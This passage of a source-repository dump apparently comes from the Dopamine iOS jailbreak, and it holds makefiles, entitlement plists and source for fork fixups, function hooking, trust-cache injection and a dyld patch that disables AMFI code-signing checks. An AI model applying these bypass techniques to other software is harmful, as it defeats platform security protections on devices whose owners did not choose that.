"systemhook" 51 | make clean 52 | cd - 53 | 54 | # watchdoghook 55 | cd "watchdoghook" 56 | make clean 57 | cd - 58 | 59 | # roothidehooks 60 | cd "roothidehooks" 61 | make clean 62 | cd - 63 | 64 | # forkfix 65 | cd "forkfix" 66 | make clean 67 | cd - 68 | 69 | cd "$PREV_DIR" -------------------------------------------------------------------------------- /BaseBin/forkfix/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = forkfix.dylib 2 | CC = clang 3 | 4 | CFLAGS = -Werror -dynamiclib -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -O2 5 | 6 | sign: $(TARGET) 7 | @ldid -S $^ 8 | 9 | $(TARGET): $(wildcard src/*.c src/*.S) 10 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 11 | 12 | clean: 13 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.c: -------------------------------------------------------------------------------- 1 | #include "litehook.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | static uint64_t __attribute((naked)) __xpaci(uint64_t a) 16 | { 17 | asm(".long 0xDAC143E0"); // XPACI X0 18 | asm("ret"); 19 | } 20 | 21 | uint64_t xpaci(uint64_t a) 22 | { 23 | // If a looks like a non-pac'd pointer just return it 24 | if ((a & 0xFFFFFF0000000000) == 0xFFFFFF0000000000) { 25 | return a; 26 | } 27 | return __xpaci(a); 28 | } 29 | 30 | uint32_t movk(uint8_t x, uint16_t val, uint16_t lsl) 31 | { 32 | uint32_t base = 0b11110010100000000000000000000000; 33 | 34 | uint32_t hw = 0; 35 | if (lsl == 16) { 36 | hw = 0b01 << 21; 37 | } 38 | else if (lsl == 32) { 39 | hw = 0b10 << 21; 40 | } 41 | else if (lsl == 48) { 42 | hw = 0b11 << 21; 43 | } 44 | 45 | uint32_t imm16 = (uint32_t)val << 5; 46 | uint32_t rd = x & 0x1F; 47 | 48 | return base | hw | imm16 | rd; 49 | } 50 | 51 | uint32_t br(uint8_t x) 52 | { 53 | uint32_t base = 0b11010110000111110000000000000000; 54 | uint32_t rn = ((uint32_t)x & 0x1F) << 5; 55 | return base | rn; 56 | } 57 | 58 | __attribute__((noinline, naked)) volatile kern_return_t litehook_vm_protect(mach_port_name_t target, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection) 59 | { 60 | __asm("mov x16, #0xFFFFFFFFFFFFFFF2"); 61 | __asm("svc 0x80"); 62 | __asm("ret"); 63 | } 64 | 65 | kern_return_t litehook_unprotect(vm_address_t addr, vm_size_t size) 66 | { 67 | return litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY); 68 | } 69 | 70 | kern_return_t litehook_protect(vm_address_t addr, vm_size_t size) 71 | { 72 | return litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_EXECUTE); 73 | } 74 | 75 | kern_return_t litehook_hook_function(void *source, void *target) 76 | { 77 | kern_return_t kr = KERN_SUCCESS; 78 | 79 | uint32_t *toHook = (uint32_t*)xpaci((uint64_t)source); 80 | uint64_t target64 = (uint64_t)xpaci((uint64_t)target); 81 | 82 | kr = litehook_unprotect((vm_address_t)toHook, 5*4); 83 | if (kr != KERN_SUCCESS) return kr; 84 | 85 | toHook[0] = movk(16, target64 >> 0, 0); 86 | toHook[1] = movk(16, target64 >> 16, 16); 87 | toHook[2] = movk(16, target64 >> 32, 32); 88 | toHook[3] = movk(16, target64 >> 48, 48); 89 | toHook[4] = br(16); 90 | uint32_t hookSize = 5 * sizeof(uint32_t); 91 | 92 | kr = litehook_protect((vm_address_t)toHook, hookSize); 93 | if (kr != KERN_SUCCESS) return kr; 94 | 95 | sys_icache_invalidate(toHook, hookSize); 96 | 97 | return KERN_SUCCESS; 98 | } 99 | -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | kern_return_t litehook_hook_function(void *source, void *target); -------------------------------------------------------------------------------- /BaseBin/forkfix/src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "syscall.h" 9 | #include "litehook.h" 10 | 11 | int64_t (*jbdswForkFix)(pid_t childPid); 12 | 13 | extern void _malloc_fork_prepare(void); 14 | extern void _malloc_fork_parent(void); 15 | extern void xpc_atfork_prepare(void); 16 | extern void xpc_atfork_parent(void); 17 | extern void dispatch_atfork_prepare(void); 18 | extern void dispatch_atfork_parent(void); 19 | extern void __fork(void); 20 | 21 | int childToParentPipe[2]; 22 | int parentToChildPipe[2]; 23 | static void openPipes(void) 24 | { 25 | if (pipe(parentToChildPipe) < 0 || pipe(childToParentPipe) < 0) { 26 | abort(); 27 | } 28 | } 29 | static void closePipes(void) 30 | { 31 | if (ffsys_close(parentToChildPipe[0]) != 0 || ffsys_close(parentToChildPipe[1]) != 0 || ffsys_close(childToParentPipe[0]) != 0 || ffsys_close(childToParentPipe[1]) != 0) { 32 | abort(); 33 | } 34 | } 35 | 36 | void child_fixup(void) 37 | { 38 | // Tell parent we are waiting for fixup now 39 | char msg = ' '; 40 | ffsys_write(childToParentPipe[1], &msg, sizeof(msg)); 41 | 42 | // Wait until parent completes fixup 43 | ffsys_read(parentToChildPipe[0], &msg, sizeof(msg)); 44 | } 45 | 46 | void parent_fixup(pid_t childPid) 47 | { 48 | // Reenable some system functionality that XPC is dependent on and XPC itself 49 | // (Normally unavailable during __fork) 50 | _malloc_fork_parent(); 51 | dispatch_atfork_parent(); 52 | xpc_atfork_parent(); 53 | 54 | // Wait until the child is ready and waiting 55 | char msg = ' '; 56 | read(childToParentPipe[0], &msg, sizeof(msg)); 57 | 58 | // Child is waiting for wx_allowed + permission fixups now 59 | // Apply fixup 60 | int64_t fix_ret = jbdswForkFix(childPid); 61 | if (fix_ret != 0) { 62 | kill(childPid, SIGKILL); 63 | abort(); 64 | } 65 | 66 | // Tell child we are done, this will make it resume 67 | write(parentToChildPipe[1], &msg, sizeof(msg)); 68 | 69 | // Disable system functionality related to XPC again 70 | _malloc_fork_prepare(); 71 | dispatch_atfork_prepare(); 72 | xpc_atfork_prepare(); 73 | } 74 | 75 | __attribute__((visibility ("default"))) pid_t forkfix___fork(void) 76 | { 77 | openPipes(); 78 | 79 | pid_t pid = ffsys_fork(); 80 | if (pid < 0) { 81 | closePipes(); 82 | return pid; 83 | } 84 | 85 | if (pid == 0) { 86 | child_fixup(); 87 | } 88 | else { 89 | parent_fixup(pid); 90 | } 91 | 92 | closePipes(); 93 | return pid; 94 | } 95 | 96 | __attribute__((constructor)) static void initializer(void) 97 | { 98 | jbdswForkFix = dlsym(RTLD_DEFAULT, "jbdswForkFix"); 99 | litehook_hook_function((void *)&__fork, (void *)&forkfix___fork); 100 | } -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.S: -------------------------------------------------------------------------------- 1 | .text 2 | 3 | .align 4 4 | 5 | .global _ffsys_fork 6 | _ffsys_fork: 7 | pacibsp 8 | stp x29, x30, [SP, #-0x10]! 9 | mov x29, sp 10 | mov x16, #2 11 | svc 0x80 12 | b.cs _ffsys_fork_err 13 | cbz x1, _ffsys_fork_end 14 | mov w0, #0 15 | adrp x9, __current_pid@GOTPAGE 16 | ldr x9, [x9, __current_pid@GOTPAGEOFF] 17 | str w0, [x9] 18 | b _ffsys_fork_end 19 | 20 | _ffsys_fork_err: 21 | bl _cerror 22 | mov w0, #-1 23 | 24 | _ffsys_fork_end: 25 | mov sp, x29 26 | ldp x29, x30, [SP],#0x10 27 | retab 28 | 29 | .global _ffsys_vm_protect 30 | _ffsys_vm_protect: 31 | mov x16, #-14 32 | svc 0x80 33 | ret 34 | 35 | .global _ffsys_getpid 36 | _ffsys_getpid: 37 | mov x16, #20 38 | svc 0x80 39 | ret 40 | 41 | .global _ffsys_pid_suspend 42 | _ffsys_pid_suspend: 43 | mov x16, #433 44 | svc 0x80 45 | ret 46 | 47 | .global _ffsys_read 48 | _ffsys_read: 49 | mov x16, #3 50 | svc 0x80 51 | ret 52 | 53 | .global _ffsys_write 54 | _ffsys_write: 55 | mov x16, #4 56 | svc 0x80 57 | ret 58 | 59 | .global _ffsys_close 60 | _ffsys_close: 61 | mov x16, #6 62 | svc 0x80 63 | ret 64 | -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.h: -------------------------------------------------------------------------------- 1 | kern_return_t ffsys_vm_protect(vm_map_t target_task, vm_address_t address, vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 2 | pid_t ffsys_fork(void); 3 | pid_t ffsys_getpid(void); 4 | int ffsys_pid_suspend(pid_t pid); 5 | 6 | ssize_t ffsys_read(int fildes, void *buf, size_t nbyte); 7 | ssize_t ffsys_write(int fildes, const void *buf, size_t nbyte); 8 | int ffsys_close(int fildes); 9 | -------------------------------------------------------------------------------- /BaseBin/forkfix/upload.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | PROJECT_NAME=forkfix.dylib 4 | DEVICE=root@localhost 5 | PORT=2222 6 | 7 | make 8 | ssh $DEVICE -p $PORT "rm -rf /var/jb/usr/lib/$PROJECT_NAME" 9 | scp -P$PORT ./$PROJECT_NAME $DEVICE:/var/jb/usr/lib/$PROJECT_NAME 10 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/Makefile: -------------------------------------------------------------------------------- 1 | XCODE_PROJECT = src/idownloadd.xcodeproj 2 | XCODE_SCHEME = idownloadd 3 | CS_FLAGS = CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED=NO 4 | CONFIGURATION = Release 5 | 6 | OUTPUT_NAME = idownloadd 7 | 8 | build: 9 | xcodebuild -archivePath ./.build -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS archive $(CS_FLAGS) 10 | @cp -f ./.build.xcarchive/Products/usr/local/bin/$(OUTPUT_NAME) . 11 | @rm -rf ./.build.xcarchive 12 | @ldid -Sentitlements.plist $(OUTPUT_NAME) 13 | 14 | clean: 15 | xcodebuild -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS clean 16 | @rm -f $(OUTPUT_NAME) 17 | 18 | default: build -------------------------------------------------------------------------------- /BaseBin/idownloadd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | com.opa334.idownloadd 7 | ProgramArguments 8 | 9 | basebin/idownloadd 10 | 11 | UserName 12 | root 13 | RunAtLoad 14 | 15 | KeepAlive 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | com.apple.private.security.storage.AppBundles 10 | 11 | com.apple.private.security.storage.AppDataContainers 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "pins" : [ 3 | { 4 | "identity" : "idownload", 5 | "kind" : "remoteSourceControl", 6 | "location" : "https://github.com/pinauten/iDownload", 7 | "state" : { 8 | "branch" : "master", 9 | "revision" : "62920e864f06af4b0a50a0aa9b6e0a7c7bd83a6f" 10 | } 11 | }, 12 | { 13 | "identity" : "swiftutils", 14 | "kind" : "remoteSourceControl", 15 | "location" : "https://github.com/pinauten/SwiftUtils", 16 | "state" : { 17 | "branch" : "master", 18 | "revision" : "1d37faabb4c58b3152394c9b6e1c1a68507646b9" 19 | } 20 | } 21 | ], 22 | "version" : 2 23 | } 24 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/iDownloadCmds.swift: -------------------------------------------------------------------------------- 1 | // 2 | // iDownloadCMDs.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | let iDownloadCmds = [ 12 | "help": iDownload_help 13 | ] as [String: iDownloadCmd] 14 | 15 | func iDownload_help(_ hndlr: iDownloadHandler, _ cmd: String, _ args: [String]) throws { 16 | try hndlr.sendline("") 17 | } 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/idownloadd-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // idownloadd-Bridging-Header.h 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | #ifndef idownloadd_Bridging_Header_h 9 | #define idownloadd_Bridging_Header_h 10 | 11 | #import 12 | 13 | #import 14 | #import 15 | #import 16 | 17 | #endif /* idownloadd_Bridging_Header_h */ 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | jbdInitPPLRW(); 12 | 13 | do { 14 | try iDownload.launch_iDownload(krw: iDownloadKRW(), otherCmds: iDownloadCmds) 15 | } catch let e { 16 | NSLog("Failed to launch iDownload: \(e)") 17 | exit(1) 18 | } 19 | 20 | RunLoop.main.run() 21 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jailbreakd 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -Wno-availability -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -O3 6 | LDFLAGS = -L../libjailbreak -ljailbreak -lbsm -larchive 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m src/*.S src/machoparse/*.c) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jailbreakd/README.md: -------------------------------------------------------------------------------- 1 | # Dopamine Base Binaries 2 | 3 | ## jailbreakd 4 | 5 | ### Supported 6 | 7 | 8 | Dopamine -> jailbreakd: 9 | - XPC call to jailbreakd, make it create a thread and return it -------------------------------------------------------------------------------- /BaseBin/jailbreakd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.jailbreakd 9 | MachServices 10 | 11 | com.opa334.jailbreakd 12 | 13 | HostSpecialPort 14 | 16 15 | 16 | com.opa334.jailbreakd.systemwide-%JBRAND% 17 | 18 | 19 | ProgramArguments 20 | 21 | basebin/jailbreakd 22 | 23 | UserName 24 | root 25 | RunAtLoad 26 | 27 | KeepAlive 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.system-task-ports 10 | 11 | com.apple.system-task-ports.control 12 | 13 | com.apple.private.security.no-container 14 | 15 | com.apple.private.amfi.can-check-trust-cache 16 | 17 | com.apple.security.exception.iokit-user-client-class 18 | 19 | AppleMobileFileIntegrityUserClient 20 | 21 | com.apple.private.bindfs-allow 22 | 23 | com.apple.private.coreservices.canmaplsdatabase 24 | 25 | com.apple.private.security.storage.AppBundles 26 | 27 | com.apple.private.security.storage.AppDataContainers 28 | 29 | com.apple.private.xpc.launchd.userspace-reboot 30 | 31 | com.apple.springboard.CFUserNotification 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/JBDTCPage.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #import "trustcache_structs.h" 4 | 5 | // 742 cdhashes fit into one page 6 | #define TC_ENTRY_COUNT_PER_PAGE 742 7 | 8 | @class JBDTCPage; 9 | 10 | extern NSMutableArray *gTCPages; 11 | extern NSMutableArray *gTCUnusedAllocations; 12 | BOOL tcPagesRecover(void); 13 | void tcPagesChanged(void); 14 | 15 | 16 | @interface JBDTCPage : NSObject 17 | { 18 | trustcache_page* _page; 19 | } 20 | 21 | @property (nonatomic) uint64_t kaddr; 22 | 23 | - (instancetype)initWithKernelAddress:(uint64_t)kaddr; 24 | - (instancetype)initAllocateAndLink; 25 | 26 | - (void)sort; 27 | - (uint32_t)amountOfSlotsLeft; 28 | - (BOOL)addEntry:(trustcache_entry)entry; 29 | - (BOOL)removeEntry:(trustcache_entry)entry; 30 | 31 | - (void)unlinkAndFree; 32 | 33 | @end 34 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/codesign.h: -------------------------------------------------------------------------------- 1 | #import 2 | int resignFile(NSString *filePath, bool preserveMetadata); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/dyld_patch.h: -------------------------------------------------------------------------------- 1 | #import 2 | int applyDyldPatches(NSString *dyldPath); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/dyld_patch.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "codesign.h" 3 | #import 4 | #import 5 | 6 | int applyDyldPatches(NSString *dyldPath) 7 | { 8 | // Find offsets by abusing CoreSymbolication APIs 9 | void *csHandle = dlopen("/System/Library/PrivateFrameworks/CoreSymbolication.framework/CoreSymbolication", RTLD_NOW); 10 | CSSymbolicatorRef (*__CSSymbolicatorCreateWithPathAndArchitecture)(const char* path, cpu_type_t type) = dlsym(csHandle, "CSSymbolicatorCreateWithPathAndArchitecture"); 11 | CSSymbolRef (*__CSSymbolicatorGetSymbolWithMangledNameAtTime)(CSSymbolicatorRef cs, const char* name, uint64_t time) = dlsym(csHandle, "CSSymbolicatorGetSymbolWithMangledNameAtTime"); 12 | CSRange (*__CSSymbolGetRange)(CSSymbolRef sym) = dlsym(csHandle, "CSSymbolGetRange"); 13 | //void (*__CSRelease)(CSTypeRef ptr) = dlsym(csHandle, "CSRelease"); 14 | 15 | CSSymbolicatorRef symbolicator = __CSSymbolicatorCreateWithPathAndArchitecture("/usr/lib/dyld", CPU_TYPE_ARM64); 16 | CSSymbolRef symbol = __CSSymbolicatorGetSymbolWithMangledNameAtTime(symbolicator, "__ZN5dyld413ProcessConfig8Security7getAMFIERKNS0_7ProcessERNS_15SyscallDelegateE", 0); 17 | CSRange range = __CSSymbolGetRange(symbol); 18 | //__CSRelease(symbolicator); 19 | //__CSRelease(symbol); 20 | uint64_t getAMFIOffset = range.location; 21 | if (getAMFIOffset == 0) { 22 | return 100; 23 | } 24 | 25 | FILE *dyldFile = fopen(dyldPath.fileSystemRepresentation, "rb+"); 26 | if (!dyldFile) return 101; 27 | fseek(dyldFile, getAMFIOffset, SEEK_SET); 28 | uint32_t patchInstr[2] = { 29 | 0xD2801BE0, // mov x0, 0xDF 30 | 0xD65F03C0 // ret 31 | }; 32 | fwrite(patchInstr, sizeof(patchInstr), 1, dyldFile); 33 | fclose(dyldFile); 34 | JBLogDebug("patched dyld"); 35 | 36 | int csRet = resignFile(dyldPath, true); 37 | if (csRet != 0) { 38 | return csRet; 39 | } 40 | JBLogDebug("resigned dyld"); 41 | 42 | return 0; 43 | } -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/fakelib.h: -------------------------------------------------------------------------------- 1 | int setFakeLibVisible(bool visible); 2 | int makeFakeLib(void); 3 | bool isFakeLibBindMountActive(void); 4 | int setFakeLibBindMountActive(bool active); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/forkfix.h: -------------------------------------------------------------------------------- 1 | int64_t apply_fork_fixup(pid_t parentPid, pid_t childPid); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/server.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | extern NSDictionary* gBootInfo; 4 | uint64_t bootInfo_getUInt64(NSString* name); 5 | uint64_t bootInfo_getSlidUInt64(NSString* name); 6 | NSData* bootInfo_getData(NSString* name); 7 | 8 | extern uint64_t gSelfProc; 9 | extern uint64_t gSelfTask; 10 | 11 | void primitivesInitializedCallback(void); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/spawn_wrapper.h: -------------------------------------------------------------------------------- 1 | #import 2 | int spawn(NSString* path, NSArray* args); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/spawn_wrapper.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import "spawn_wrapper.h" 4 | #import 5 | extern char **environ; 6 | 7 | int spawn(NSString* path, NSArray* args) 8 | { 9 | NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new]; 10 | [argsM insertObject:path atIndex:0]; 11 | 12 | NSUInteger argCount = [argsM count]; 13 | char **argsC = (char **)malloc((argCount + 1) * sizeof(char*)); 14 | 15 | for (NSUInteger i = 0; i < argCount; i++) 16 | { 17 | argsC[i] = strdup([[argsM objectAtIndex:i] UTF8String]); 18 | } 19 | argsC[argCount] = NULL; 20 | 21 | pid_t task_pid; 22 | int status = -200; 23 | int spawnError = posix_spawn(&task_pid, path.fileSystemRepresentation, NULL, NULL, (char *const *)argsC, environ); 24 | for (NSUInteger i = 0; i < argCount; i++) 25 | { 26 | free(argsC[i]); 27 | } 28 | free(argsC); 29 | if (spawnError != 0) return spawnError; 30 | do 31 | { 32 | if (waitpid(task_pid, &status, 0) != -1) { 33 | JBLogDebug("Child status %d", WEXITSTATUS(status)); 34 | } else 35 | { 36 | perror("waitpid"); 37 | return -222; 38 | } 39 | } while (!WIFEXITED(status) && !WIFSIGNALED(status)); 40 | 41 | return WEXITSTATUS(status); 42 | } -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/trustcache.h: -------------------------------------------------------------------------------- 1 | #import "trustcache_structs.h" 2 | #import 3 | 4 | void dynamicTrustCacheAddEntry(trustcache_entry entry); 5 | void dynamicTrustCacheRemoveEntry(trustcache_entry entry); 6 | void fileEnumerateTrustCacheEntries(NSURL *fileURL, void (^enumerateBlock)(trustcache_entry entry)); 7 | void dynamicTrustCacheUploadFile(NSURL *fileURL); 8 | void dynamicTrustCacheUploadCDHashFromData(NSData *cdHash); 9 | void dynamicTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray); 10 | void dynamicTrustCacheUploadDirectory(NSString *directoryPath); 11 | void rebuildDynamicTrustCache(void); 12 | 13 | BOOL trustCacheListAdd(uint64_t trustCacheKaddr); 14 | BOOL trustCacheListRemove(uint64_t trustCacheKaddr); 15 | uint64_t staticTrustCacheUploadFile(trustcache_file *fileToUpload, size_t fileSize, size_t *outMapSize); 16 | uint64_t staticTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray, size_t *outMapSize);; 17 | uint64_t staticTrustCacheUploadFileAtPath(NSString *filePath, size_t *outMapSize); 18 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/trustcache_structs.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | typedef struct sTrustcache_entry 6 | { 7 | uint8_t hash[CS_CDHASH_LEN]; 8 | uint8_t hash_type; 9 | uint8_t flags; 10 | } __attribute__((__packed__)) trustcache_entry; 11 | 12 | typedef struct sTrustcache_file 13 | { 14 | uint32_t version; 15 | uuid_t uuid; 16 | uint32_t length; 17 | trustcache_entry entries[]; 18 | } __attribute__((__packed__)) trustcache_file; 19 | 20 | typedef struct sTrustcache_page 21 | { 22 | uint64_t nextPtr; 23 | uint64_t selfPtr; 24 | trustcache_file file; 25 | } __attribute__((__packed__)) trustcache_page; 26 | 27 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/update.h: -------------------------------------------------------------------------------- 1 | #import 2 | NSString *trollStoreRootHelperPath(void); 3 | int basebinUpdateFromTar(NSString *basebinPath, bool rebootWhenDone); 4 | int jbUpdateFromTIPA(NSString *tipaPath, bool rebootWhenDone); -------------------------------------------------------------------------------- /BaseBin/jbctl/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbctl 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jbctl/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.security.exception.mach-lookup.global-name 12 | 13 | com.opa334.jailbreakd 14 | 15 | com.apple.private.xpc.launchd.userspace-reboot 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/jbctl/rebuild_daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.trustcache_rebuild 9 | ProgramArguments 10 | 11 | basebin/jbctl 12 | rebuild_trustcache 13 | 14 | RunAtLoad 15 | 16 | StartCalendarInterval 17 | 18 | Hour 19 | 0 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /BaseBin/jbinit/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbinit 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -I../_shared -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist -Icom.apple.jbinit $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jbinit/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | task_for_pid-allow 10 | 11 | get-task-allow 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /BaseBin/jbinit/src/launchctl.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #ifndef launchctl_h 4 | #define launchctl_h 5 | 6 | #if defined(__cplusplus) 7 | extern "C" { 8 | #endif 9 | 10 | extern int64_t launchctl_load(const char* plistPath, bool unload); 11 | 12 | #if defined(__cplusplus) 13 | } 14 | #endif 15 | 16 | #endif /* launchctl_h */ -------------------------------------------------------------------------------- /BaseBin/jbinit/src/launchctl.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | #define ROUTINE_LOAD 800 6 | #define ROUTINE_UNLOAD 801 7 | 8 | int64_t launchctl_load(const char* plistPath, bool unload) 9 | { 10 | xpc_object_t pathArray = xpc_array_create_empty(); 11 | xpc_array_set_string(pathArray, XPC_ARRAY_APPEND, plistPath); 12 | 13 | xpc_object_t msgDictionary = xpc_dictionary_create_empty(); 14 | xpc_dictionary_set_uint64(msgDictionary, "subsystem", 3); 15 | xpc_dictionary_set_uint64(msgDictionary, "handle", 0); 16 | xpc_dictionary_set_uint64(msgDictionary, "type", 1); 17 | xpc_dictionary_set_bool(msgDictionary, "legacy-load", true); 18 | xpc_dictionary_set_bool(msgDictionary, "enable", false); 19 | xpc_dictionary_set_uint64(msgDictionary, "routine", unload ? ROUTINE_UNLOAD : ROUTINE_LOAD); 20 | xpc_dictionary_set_value(msgDictionary, "paths", pathArray); 21 | 22 | xpc_object_t msgReply = launchd_xpc_send_message(msgDictionary); 23 | 24 | char *msgReplyDescription = xpc_copy_description(msgReply); 25 | printf("msgReply = %s\n", msgReplyDescription); 26 | free(msgReplyDescription); 27 | 28 | int64_t bootstrapError = xpc_dictionary_get_int64(msgReply, "bootstrap-error"); 29 | if(bootstrapError != 0) 30 | { 31 | printf("bootstrap-error = %s\n", xpc_strerror((int32_t)bootstrapError)); 32 | return bootstrapError; 33 | } 34 | 35 | int64_t error = xpc_dictionary_get_int64(msgReply, "error"); 36 | if(error != 0) 37 | { 38 | printf("error = %s\n", xpc_strerror((int32_t)error)); 39 | return error; 40 | } 41 | 42 | // launchctl seems to do extra things here 43 | // like getting the audit token via xpc_dictionary_get_audit_token 44 | // or sometimes also getting msgReply["req_pid"] and msgReply["rec_execcnt"] 45 | // but we don't really care about that here 46 | 47 | return 0; 48 | } 49 | -------------------------------------------------------------------------------- /BaseBin/jbinit/src/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import "launchctl.h" 5 | 6 | int main(int argc, char* argv[]) 7 | { 8 | NSString *idownloaddEnabledPath = 